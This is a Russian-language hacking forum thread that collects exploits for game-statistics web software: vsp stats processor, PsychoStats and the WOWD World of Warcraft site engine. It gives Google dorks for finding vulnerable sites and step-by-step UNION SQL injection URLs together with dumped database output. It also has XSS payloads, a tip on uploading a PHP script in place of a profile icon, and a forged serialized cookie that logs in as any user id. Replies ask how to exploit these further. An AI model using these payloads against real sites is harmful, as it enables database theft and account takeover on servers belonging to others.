Форум АНТИЧАТ - [ Уязвимости статистики для онлайн игр ]

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)

- - [ Уязвимости статистики для онлайн игр ] (https://forum.antichat.xyz/showthread.php?t=58857)

[ Уязвимости статистики для онлайн игр ]

название: vsp stats processor
версия: 0.45 /*старше не встречал*/
dork: "powered by vsp stats processor"
тип уязвимости: SQL-injection

пути могут вариироватся

Цитата:

http://site/statistics/cod2stats/pub/themes/bismarck/gamestat.php?gameID=117958872373782600+and+1=1/*'&config=cfg-default.php

http://site/statistics/cod2stats/pub/themes/bismarck/gamestat.php?gameID=117958872373782600+order+by+10/*'&config=cfg-default.php

вывод

Цитата:

http://site/statistics/cod2stats/pub/themes/bismarck/gamestat.php?gameID=117958872373782600+union+selec t+11111,22222,33333,44444,555555,66666,777777,8888 8,99999,10/*'&config=cfg-default.php

смотрим куда можна вывести

Цитата:

http://site/statistics/cod2stats/pub/themes/bismarck/gamestat.php?gameID=117958872373782600+union+selec t+11111,22222,33333,44444,555555,66666,777777,conc at_ws(0x3a3a,version(),user(),database()),99999,10/*'&config=cfg-default.php

5.0.22::cod2stats@192.168.255.76::cod2stats

Цитата:

http://site/statistics/cod2stats/pub/themes/bismarck/gamestat.php?gameID=117958872373782600+union+selec t+11111,22222,33333,44444,555555,66666,777777,conc at_ws(0x3a3a,table_schema,table_name),99999,10+fro m+information_schema.tables/*'&config=cfg-default.php

вывод красивый..смотрим.. /*красивый потому, что видно сразу весь вывод, не нужно лимитом*/

поля и таблицы системы

Цитата:

Cod2stats::vspawards
Cod2stats::vspeventdata1d
Cod2stats::vspeventdata2d
Cod2stats::vspgamedata
Cod2stats::vspplayerdata
Cod2stats::vspplayerprofile
Cod2stats::vspq3awardsaccuracy
Cod2stats::vspq3eventdata1d
Cod2stats::vspq3eventdata2d
Cod2stats::vspq3gamedata
Cod2stats::vspq3playerdata
Cod2stats::vspq3playerprofile
Cod2stats::vspawards::awardid
Cod2stats::vspawards::category
Cod2stats::vspawards::image
Cod2stats::vspawards::name
Cod2stats::vspawards::playerid
Cod2stats::vspawards::sqlrq
Cod2stats::vspeventdata1d::eventcategory
Cod2stats::vspeventdata1d::eventname
Cod2stats::vspeventdata1d::eventvalue
Cod2stats::vspeventdata1d::gameid
Cod2stats::vspeventdata1d::playerid
Cod2stats::vspeventdata1d::role
Cod2stats::vspeventdata1d::round
Cod2stats::vspeventdata1d::team
Cod2stats::vspeventdata2d::eventcategory
Cod2stats::vspeventdata2d::eventname
Cod2stats::vspeventdata2d::eventvalue
Cod2stats::vspeventdata2d::gameid
Cod2stats::vspeventdata2d::player2id
Cod2stats::vspeventdata2d::playerid
Cod2stats::vspeventdata2d::role
Cod2stats::vspeventdata2d::role2
Cod2stats::vspeventdata2d::round
Cod2stats::vspeventdata2d::team
Cod2stats::vspeventdata2d::team2
Cod2stats::vspgamedata::gameid
Cod2stats::vspgamedata::name
Cod2stats::vspgamedata::value
Cod2stats::vspplayerdata::dataname
Cod2stats::vspplayerdata::datano
Cod2stats::vspplayerdata::datavalue
Cod2stats::vspplayerdata::gameid
Cod2stats::vspplayerdata::playerid
Cod2stats::vspplayerprofile::deathstreak
Cod2stats::vspplayerprofile::deaths
Cod2stats::vspplayerprofile::games
Cod2stats::vspplayerprofile::killstreak
Cod2stats::vspplayerprofile::kills
Cod2stats::vspplayerprofile::playerid
Cod2stats::vspplayerprofile::playername
Cod2stats::vspplayerprofile::skill
Cod2stats::vspq3awardsaccuracy::accuracy
Cod2stats::vspq3awardsaccuracy::games
Cod2stats::vspq3awardsaccuracy::hits
Cod2stats::vspq3awardsaccuracy::playerid
Cod2stats::vspq3awardsaccuracy::playername
Cod2stats::vspq3awardsaccuracy::shots
Cod2stats::vspq3awardsaccuracy::weaponid

p.s. админки тут как таковой нет.. поэтому использовать можно для вывода других таблиц или если есть права на заливку/чтение файлов
p.p.s. используется на серверах провайдеров /*локалки и тд*/

PsychoStats
Google d0rk: "Powered by PsychoStats"

[Full-disclosure] PsychoStats 3.0.6b and prior

Цитата:

http://PsychoStats/includes/smarty/Smarty.class.php
http://PsychoStats/server.php?newcss=styles.css&newtheme=%00

PsychoStats v3.0.6b Multiple Cross-Site Scripting Vulnerabilities

Цитата:

http://PsychoStats/weapons.php/%3E%22%3E%3Cscript%3Ealert(1%20%20)%3C/script%3E

ранее была ксс в логине

[SQL-injection]
Удалённый пользоваель может выполнить произвольный SQL-запрос.
Уязвимости существуют из-за:
отсутствия проверки параметра id в скрипте map.php
отсутствия проверки параметра id в скрипте weapon.php
Пример использования:

Цитата:

http://PsychoStats/map.php?id=3+limit+0+union+select+1,1,1,111111111, 1,1,1,1,1,1,1,2222222,1,1,1,1,1+from+mysql.user/*
http://PsychoStats/weapon.php?id=20+limit+0+union+select+1,1,1,1,1,22 22222,1,1,1,1,1,1,1,11111111,1,1,1,1,1/*

p.s. ранее выкладывалось на ачате по кмс
https://forum.antichat.ru/showpost.php?p=464066&postcount=3159
http://video.antichat.ru/file250.html
з.з.ы. более ранние версии не рассматривались

Цитата:

Сообщение от m0nzt3r

Там еще можно иконку заливать в профиле (Хотя я не везде видел).Так вот, вместо нее заливаем пхп скрипт ) Только не помню, называем 1.ico.php - так кажется
m0nzt3r 3.0.7б это

PsychoStats

Google d0rk: "Powered by PsychoStats"
Multiple Remote SQL Injection Vulnerabilities

PsychoStats v2.3
SQL

Код:

www.site.com/weapon.php?id=1+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--

PsychoStats v2.3.1
SQL

Код:

www.site.com/map.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,user(),13,14,15,16,17--

PsychoStats v2.3.3
SQL

Код:

www.site.com/weapon.php?id=1+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*

PsychoStats v3.1

XSS in PsychoStats v3.1

PHP код:


		
			
/admin/login.php?ref="><script>alert("XSS by Gromoza")</script>

WOWD Движок сайта WoW

PHP код:


		
			
 function check()

    {

        if(isset($_COOKIE[$this->config['site_cookie']])){

            list($cookie['user_id'], $cookie['password_hash']) = @unserialize(stripslashes($_COOKIE[$this->config['site_cookie']]));

            if($cookie['user_id'] < 1)return false;

            $res = $this->DB->selectRow('realmd', "SELECT * FROM account WHERE `id` = ?d", $cookie['user_id']);

            if($cookie['password_hash'] == $res['sha_pass_hash']){

                unset($res['password']);

                $this->user = $res;

                return true;

            }else{

                return false;

            }

        }else{

            return false;

        }

    }

красивая дырень :)

Цитата:

Сообщение от chekist

WOWD Движок сайта WoW

PHP код:


		
			
 function check()

    {

        if(isset($_COOKIE[$this->config['site_cookie']])){

            list($cookie['user_id'], $cookie['password_hash']) = @unserialize(stripslashes($_COOKIE[$this->config['site_cookie']]));

            if($cookie['user_id'] < 1)return false;

            $res = $this->DB->selectRow('realmd', "SELECT * FROM account WHERE `id` = ?d", $cookie['user_id']);

            if($cookie['password_hash'] == $res['sha_pass_hash']){

                unset($res['password']);

                $this->user = $res;

                return true;

            }else{

                return false;

            }

        }else{

            return false;

        }

    }

красивая дырень :)

Может ктониить подсказать, как ее раскрутить. Я как понял есть какая-то возможность sql-injection через куки провести, или я не так все понял?

вся фишка в @unserialize и

PHP код:


		
			
if($cookie['password_hash'] == $res['sha_pass_hash']){

этом условии
когда зарегаешся на двишке получиш подобные плюшки

Код:

wowduser=a%3A2%3A%7Bi%3A0%3Bs%3A4%3A%226106%22%3Bi%3A1%3Bs%3A40%3A%2258c3f53a0b2e80dd3c2990a8d3c691a16c78b9dd%22%3B%7D

меняеш на

Код:

wowduser=a%3A2%3A%7Bi%3A0%3Bs%3A3%3A%22[тут id пользователя без квадратных скобок]%22%3Bi%3A1%3Bb%3A1%3B%7D

возможна и скуль, но слепая

Спс за ответ. Можеш еще подсказать в каком файле эти строчки? Просто скачал движок, пока не нашел) Взарание спс)

вроде function.php , точно не помню, а ты откуда скачал версия может быть другой

chekist, качал вроде с _http://mangos.ru/forum точнее не скажу, уже не помню. Покавыпялся в нем на сайтах, походу версий его немерено и мало кто использует встроеную в него панель управления аккаунтом, а жаль =(